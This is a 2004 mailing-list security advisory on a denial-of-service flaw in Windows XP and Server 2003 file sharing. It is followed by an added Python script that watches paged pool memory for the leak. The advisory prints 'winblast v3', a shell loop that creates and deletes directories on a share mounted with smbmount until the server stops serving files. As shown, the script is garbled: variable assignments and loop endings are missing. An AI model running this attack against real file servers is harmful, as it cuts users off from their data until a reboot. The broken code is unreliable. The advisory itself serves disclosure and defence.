smbmount disrupts Windows file sharing.

From: Daniel Kabs [ML] (
Date: 02/02/04

    Date: Mon, 02 Feb 2004 16:40:48 +0100

    Announced: 2004-02-02
    Type: Denial of Service Attack on Windows
    Impact: smbmount can stop Windows from sharing files
    Writer: Daniel Kabs, Germany (
    Credits: Thanks to Steve Ladjabi (

    1. Abstract
    2. Affected Systems
    3. Attack Setup
    4. Symptoms
    5. Workaround

    1. Abstract

    A security vulnerability of "Windows XP" and "Windows 2003
    Server" has been found. These systems are open to a denial
    of service attack. If they share folders to a Unix client
    that is using smbmount (part of the Samba suite), any user
    on the client who has permissions to create directories on
    the mounted share can stop the Windows system from serving
    files. The attack induces a memory shortage on the Windows
    system by creating directories in a special way.

    2. Affected Systems

    This denial of service attack has been carried out
    successfully against
    - Microsoft Windows XP Professional, Service Pack 1
    - Microsoft Windows Server 2003

    Microsoft Windows 2000 Prof. and earlier versions of
    Windows are not affected by this attack.

    3. Attack Setup

    The attack was carried out successfully using
    - "Debian Linux", smbmount 3.0.0beta2
    - "Suse Linux 8.2", smbmount version 2.2.2
    as Unix clients

    The Windows system shares a folder. The Unix client mounts
    the share using smbmount. A user on the Unix client has
    write/create permissions to the shared folder.

    The user on the client creates and deletes a lot of
    directories on the mounted share using the following

    # winblast v3 - DoS on WinXP, Win2003Srv
    # 2003-12-04 Steve Ladjabi


    # using 'pathcount' directories

    echo running \'winblast v3\' with $pathcount files in loop

    while [ 1 ]; do
      while [ "$p" != "$stop" ]; do
        # delete old directory if it exists, exit on any error
        if [ -d $dirname ]; then
          rmdir $dirname || exit 3

        # generating directory and exit on any error
        mkdir $dirname || exit 1
      echo $count directories generated ...
    #-- end --

    The script creates 1000 directories and then takes
    turns deleting and re-creating them. There will be no
    more than those 1000 directories at any time!

    Every time a directory is created, the Windows system
    allocates paged pool memory. This memory is not freed
    although the directory gets deleted.

    After having created and deleted 3.5 million directories,
    the Windows system's paged pool memory has been depleted
    and it denies access to the share. One tested Windows XP
    system managed to take 5.8 million directories until it
    stopped serving. This happens about 4 hours after the
    attack was started.

    4. Symptoms

    When the Windows system suddenly fails, it ceases serving,
    i.e. users can neither access files nor list directory
    contents any more from the client. Any client will have
    lost its access to the share.

    On the Windows system the event log shows an error with
    event id 2020.

    Additionally, the Administrator of the Windows system can
    neither unshare the folder nor kill the session due to the
    lack of memory resources. Trying to open the management
    console will result in error messages to this effect.
    Executing the command "net share /delete" fails due to
    the memory shortage.

    The only way to get the Windows system working again is
    to reboot it.

    Putting more RAM in the machine running Windows will not
    help as the paged pool memory is limited to 343MB. (See
    MS KB article Q312362).

    5. Workaround

    Administrators should schedule a daily reboot of the
    Windows system.
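
A defender-side check for the leak described in this advisory, added here as an example and not part of the original post: it fits a trend to periodic paged pool readings and projects when the 343 MB ceiling would be reached, so an operator is warned before the share stops responding. The sample readings are constructed; in practice they are assumed to come from the Windows performance counter `\Memory\Pool Paged Bytes`, and the thresholds are illustrative.

```python
"""Project paged pool exhaustion from periodic counter samples (added example)."""

# Ceiling quoted in the advisory (MS KB Q312362).
PAGED_POOL_LIMIT_MB = 343.0


def growth_rate(samples):
    """Least-squares slope in MB per minute over (minute, pool_mb) samples."""
    n = len(samples)
    mean_t = sum(t for t, _ in samples) / n
    mean_v = sum(v for _, v in samples) / n
    var_t = sum((t - mean_t) ** 2 for t, _ in samples)
    if var_t == 0:
        return 0.0
    return sum((t - mean_t) * (v - mean_v) for t, v in samples) / var_t


def rising_fraction(samples):
    """Share of intervals in which the pool grew; a leak rarely gives memory back."""
    steps = list(zip(samples, samples[1:]))
    return sum(1 for a, b in steps if b[1] > a[1]) / len(steps)


def minutes_to_exhaustion(samples, limit_mb=PAGED_POOL_LIMIT_MB):
    """Projected minutes until the limit is hit, or None if there is no steady growth."""
    if len(samples) < 3 or rising_fraction(samples) < 0.9:
        return None
    rate = growth_rate(samples)
    if rate <= 0:
        return None
    return max(0.0, (limit_mb - samples[-1][1]) / rate)


def assess(samples, warn_minutes=240, critical_minutes=60):
    """Classify a host as 'ok', 'warn' or 'critical' (thresholds are assumptions)."""
    eta = minutes_to_exhaustion(samples)
    if eta is None or eta >= warn_minutes:
        return "ok"
    return "critical" if eta < critical_minutes else "warn"


# Constructed readings: (minutes since first sample, paged pool in MB).
LEAKING = [(0, 60), (10, 72), (20, 84), (30, 96), (40, 108), (50, 120)]
NEAR_LIMIT = [(0, 300), (10, 312), (20, 324)]
HEALTHY = [(0, 60), (10, 63), (20, 58), (30, 61), (40, 59), (50, 60)]

if __name__ == "__main__":
    for name, data in (("leaking", LEAKING), ("near limit", NEAR_LIMIT), ("healthy", HEALTHY)):
        print(name, assess(data), minutes_to_exhaustion(data))
```

Requiring growth in nearly every interval keeps ordinary fluctuation from raising an alert, since the advisory's symptom is memory that is never released.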
